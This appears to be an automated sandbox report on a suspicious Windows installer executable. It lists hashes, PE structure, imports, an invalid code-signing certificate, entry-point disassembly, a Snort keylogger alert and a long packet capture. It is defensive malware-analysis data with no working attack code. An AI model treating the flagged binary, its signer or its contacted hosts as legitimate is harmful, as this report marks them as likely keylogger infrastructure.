MD5:	a6ef5ed777ba7369c2bb28e46b198ba6
SHA1:	f707bc0343f41d95f57e776a9f85f6a2c5791aa7
SHA256:	878d710875b07ec61bef0b198ba67bf81ad0730a3a483d5762cd18e13fb4b525
SHA512:	3b0bbbf4199dfc669a75a8fb62cfa55423e2331358f43057219ee2a4099cc9c2b007d85b2cb1b6cd9c64d8d8421575690bed95556ca788cf13d6a53c96b3a2eb
SSDEEP:	6144:B6bAcJvkzKmPPzS58G93IuZCBabjYBNwmlJ8kUEe/oqBaH0NxsvLg/nkrIak7r8m:a7ubCHICiwkBySs/vBGwxs0vh7rXN
TLSH:	B194F161BFDBE857D02278B4A09ADE1E5E74EF14A249E307F3B139ACE5752513C1B202
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....uY.................d....:....

File Icon


Icon Hash:	20c4f8f8e8f0f24c

Static PE Info

General

Entrypoint:	0x403350
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x59759518 [Mon Jul 24 06:35:04 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Giordano@Agencies.ano, OU="Desidiose Haarvkstens ", O=Percussion, L=Mccomb, S=Mississippi, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	09/01/2023 02:53:11 08/01/2026 02:53:11
Subject Chain	E=Giordano@Agencies.ano, OU="Desidiose Haarvkstens ", O=Percussion, L=Mccomb, S=Mississippi, C=US
Version:	3
Thumbprint MD5:	B7600E9E947B9005922C17012BBF815F
Thumbprint SHA-1:	F61732487D62043541218B18386BFA3513D9C7CF
Thumbprint SHA-256:	C6510EBAF8763805CB5E0AAB32A94AEEFD9E39180B9A6D5F85E0272807031574
Serial:	1B9B07C3A599FD0DBF3CF80F5B8149857D2F3BA7

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [007A8A2Ch], eax
je 00007F7B10C23313h
push ebx
call 00007F7B10C265A9h
cmp eax, ebx
je 00007F7B10C23309h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F7B10C26523h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F7B10C232ECh
push 0000000Ah
call 00007F7B10C2657Ch
push 00000008h
call 00007F7B10C26575h
push 00000006h
mov dword ptr [007A8A24h], eax
call 00007F7B10C26569h
cmp eax, ebx
je 00007F7B10C23311h
push 0000001Eh
call eax
test eax, eax
je 00007F7B10C23309h
or byte ptr [007A8A2Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [007A8AF8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0079FEE0h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3d0000	0x28268	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x67500	0x2200	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x63c8	0x6400	False	0.6766015625	data	6.504099201068482	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x138e	0x1400	False	0.4509765625	data	5.146454805063938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39eb38	0x600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x27000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3d0000	0x28268	0x28400	False	0.3355129076086957	data	4.767250735975199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3d0310	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States
RT_ICON	0x3e0b38	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	English	United States
RT_ICON	0x3e9fe0	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736	English	United States
RT_ICON	0x3ef468	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States
RT_ICON	0x3f3690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States
RT_ICON	0x3f5c38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States
RT_ICON	0x3f6ce0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	English	United States
RT_ICON	0x3f7668	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States
RT_DIALOG	0x3f7ad0	0x100	data	English	United States
RT_DIALOG	0x3f7bd0	0xf8	data	English	United States
RT_DIALOG	0x3f7cc8	0xa0	data	English	United States
RT_DIALOG	0x3f7d68	0x60	data	English	United States
RT_GROUP_ICON	0x3f7dc8	0x76	data	English	United States
RT_MANIFEST	0x3f7e40	0x423	XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.20132.226.8.16949801802039190 03/20/23-11:06:12.385242	TCP	2039190	ET TROJAN 404/Snake/Matiex Keylogger Style External IP Check	49801	80	192.168.11.20	132.226.8.169

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 20, 2023 11:06:09.958184958 CET	49799	443	192.168.11.20	142.250.181.238
Mar 20, 2023 11:06:09.958285093 CET	443	49799	142.250.181.238	192.168.11.20
Mar 20, 2023 11:06:09.958506107 CET	49799	443	192.168.11.20	142.250.181.238
Mar 20, 2023 11:06:09.984272957 CET	49799	443	192.168.11.20	142.250.181.238
Mar 20, 2023 11:06:09.984397888 CET	443	49799	142.250.181.238	192.168.11.20
Mar 20, 2023 11:06:10.045090914 CET	443	49799	142.250.181.238	192.168.11.20
Mar 20, 2023 11:06:10.045358896 CET	49799	443	192.168.11.20	142.250.181.238
Mar 20, 2023 11:06:10.047038078 CET	443	49799	142.250.181.238	192.168.11.20
Mar 20, 2023 11:06:10.047301054 CET	49799	443	192.168.11.20	142.250.181.238
Mar 20, 2023 11:06:10.179662943 CET	49799	443	192.168.11.20	142.250.181.238
Mar 20, 2023 11:06:10.179781914 CET	443	49799	142.250.181.238	192.168.11.20
Mar 20, 2023 11:06:10.181099892 CET	443	49799	142.250.181.238	192.168.11.20
Mar 20, 2023 11:06:10.181324959 CET	49799	443	192.168.11.20	142.250.181.238
Mar 20, 2023 11:06:10.186059952 CET	49799	443	192.168.11.20	142.250.181.238
Mar 20, 2023 11:06:10.228410006 CET	443	49799	142.250.181.238	192.168.11.20
Mar 20, 2023 11:06:10.607240915 CET	443	49799	142.250.181.238	192.168.11.20
Mar 20, 2023 11:06:10.607516050 CET	49799	443	192.168.11.20	142.250.181.238
Mar 20, 2023 11:06:10.607625961 CET	443	49799	142.250.181.238	192.168.11.20
Mar 20, 2023 11:06:10.607702971 CET	443	49799	142.250.181.238	192.168.11.20
Mar 20, 2023 11:06:10.607809067 CET	49799	443	192.168.11.20	142.250.181.238
Mar 20, 2023 11:06:10.607871056 CET	49799	443	192.168.11.20	142.250.181.238
Mar 20, 2023 11:06:10.608670950 CET	49799	443	192.168.11.20	142.250.181.238
Mar 20, 2023 11:06:10.608751059 CET	443	49799	142.250.181.238	192.168.11.20
Mar 20, 2023 11:06:10.719572067 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.719638109 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.719877005 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.721764088 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.721791029 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.784081936 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.784686089 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.786132097 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.786376953 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.789782047 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.789808035 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.790358067 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.790604115 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.790844917 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.832494974 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.990123034 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.990459919 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.990459919 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.990549088 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.990758896 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.990837097 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.990875006 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.991152048 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.991658926 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.991830111 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.991830111 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.991880894 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.992635965 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.992887974 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.992938995 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.993135929 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.994764090 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.994924068 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.994976044 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.995349884 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.997493029 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.997740030 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.998691082 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.998888016 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.998948097 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.999191999 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.999248028 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.999530077 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.999576092 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.999773979 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:10.999778986 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:10.999816895 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.000003099 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.000003099 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.000072956 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.000294924 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.000356913 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.000560999 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.000607014 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.000802040 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.000852108 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.001095057 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.001132965 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.001480103 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.001739979 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.001935959 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.001996994 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.002201080 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.002250910 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.002553940 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.002605915 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.002842903 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.002895117 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.002944946 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.003164053 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.003164053 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.003472090 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.003706932 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.003756046 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.003926992 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.003973961 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.004225969 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.004287958 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.004504919 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.004558086 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.004844904 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.004889965 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.005086899 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.005131960 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.005325079 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.005346060 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.005374908 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.005662918 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.005707026 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.005911112 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.006064892 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.006263018 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.006319046 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.006515026 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.006548882 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.006783962 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.007283926 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.007477045 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.007622957 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.007813931 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.007875919 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.008069992 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.008122921 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.008375883 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.008418083 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.008717060 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.008717060 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.008760929 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.008966923 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.008966923 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.009032011 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.009248972 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.009293079 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.009495020 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.009530067 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.009718895 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.009747028 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.009774923 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.010253906 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.010339022 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.010365009 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.010704994 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.010751009 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.010998964 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.011044979 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.011240005 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.011281013 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.011472940 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.011516094 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.011707067 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.011749029 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.011842966 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.011940956 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.012042046 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.012132883 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.012378931 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.012430906 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.012626886 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.012676001 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.012883902 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.012928963 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.013228893 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.013277054 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.013524055 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.013561964 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.013585091 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.013691902 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.013866901 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.013951063 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.014199972 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.014246941 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.014517069 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.014544964 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.014569044 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.014859915 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.014909983 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.015132904 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.015185118 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.015444994 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.015496016 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.015521049 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.015786886 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.015888929 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.016124010 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.016177893 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.016382933 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.016438961 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.016720057 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.016772032 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.016971111 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.017024040 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.017077923 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.017189980 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.017318010 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.017360926 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.017416954 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.017550945 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.017680883 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.017692089 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.017734051 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.017898083 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.017986059 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.018024921 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.018220901 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.018240929 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.018290997 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.018436909 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.018604994 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.018654108 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.018819094 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.018861055 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.019040108 CET	443	49800	142.250.185.193	192.168.11.20
